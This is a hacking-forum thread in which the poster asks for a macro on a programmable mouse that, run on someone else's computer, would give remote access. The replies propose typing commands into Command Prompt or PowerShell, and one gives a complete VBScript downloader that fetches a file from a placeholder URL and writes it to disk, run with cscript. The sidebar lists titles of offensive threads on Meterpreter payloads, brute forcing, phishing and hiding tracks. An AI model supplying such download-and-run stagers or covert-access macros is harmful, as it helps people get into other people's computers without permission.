I just got a macro programmable mouse and was thinking that it could be interesting to create a macro so that when run on someone elses computer could allow remote access, or do something else of interest. Any ideas out there? It would have to be some command that could be recorded on the mouses macro. Such as opening a web browser and searching a specific url.
Forum Thread: Macro Mouse Hack
- Hot
- Active
-
Forum Thread: What Are Some Good Budget Laptops for Pentestin 12 Replies
2 days ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 8 Replies
2 days ago -
Forum Thread: Hack Instagram Account Using BruteForce 193 Replies
2 days ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 117 Replies
4 days ago -
Forum Thread: How Do I Access Different Directories Within Android via Meterpreter 5 Replies
6 days ago -
Forum Thread: Best Programming Language? 8 Replies
1 wk ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 4 Replies
1 wk ago -
Forum Thread: Fix Meterpreter Problem 2 Replies
1 wk ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 31 Replies
2 wks ago -
Forum Thread: Need Help with FatRat Over WAN 1 Replies
2 wks ago -
Forum Thread: Kali Linux Boot Error 8 Replies
2 wks ago -
Forum Thread: I Want to Hack in to My Friends System Through his wifi router i am controlling 8 Replies
2 wks ago -
Forum Thread: Kali linux command error. Kindly help 3 Replies
2 wks ago -
Forum Thread: How to Create a Python Remote Keylogger for Facebook 27 Replies
2 wks ago -
Forum Thread: Kali Linux Handshake Porblem 2 Replies
2 wks ago -
Forum Thread: Port Forwarding Problem in Metasploit Can't Establish Connection (WAN) 3 Replies
3 wks ago -
Forum Thread: GMail Brute Force Dictionary Attack Script 31 Replies
4 wks ago -
Forum Thread: Msfvenom Android Exploitation Outside LAN? 12 Replies
4 wks ago -
Forum Thread: How to decrypt .CAP file of handshake during WiFi attack 2 Replies
1 mo ago -
Forum Thread: Make a Phishing Page for Harvesting Credentials Yourself 7 Replies
1 mo ago
-
How To: Make Spoofed Calls Using Any Phone Number You Want Right from Your Smartphone
-
How To: Master Python, Django, Git & GitHub with This Bundle
-
How To: Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected
-
How To: Hack Android Using Kali (Remotely)
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Phish for Social Media & Other Account Passwords with BlackEye
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Automate Wi-Fi Hacking with Wifite2
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Crack Password-Protected ZIP Files, PDFs & More with Zydra
-
Hack Like a Pro: How to Crack Passwords, Part 4 (Creating a Custom Wordlist with Crunch)
-
How To: Hack Any Account That Has Recovery via Phone Option Enabled (SMS) On Android:
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Create a Persistent Back Door in Android Using Kali Linux:
4 Responses
My mouse has buttons for keystrokes and combinations, so it seems like it could be programmed to maybe open a Command Prompt, and type some commands. That'd be pretty cool.
Thats what i was thinking as well. I just don't know what kind of command would be useful to quicky run.
There seem to be some commands for PowerShell that can download pages from the internet, and I'm sure there are commands to run them.
You can write a VBScript and run it from CMD:
*' Set your settings
strFileURL = "http://example.com/download"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing*
And to run the file from CMD - cscript.exe downloadfile.vbs
Share Your Thoughts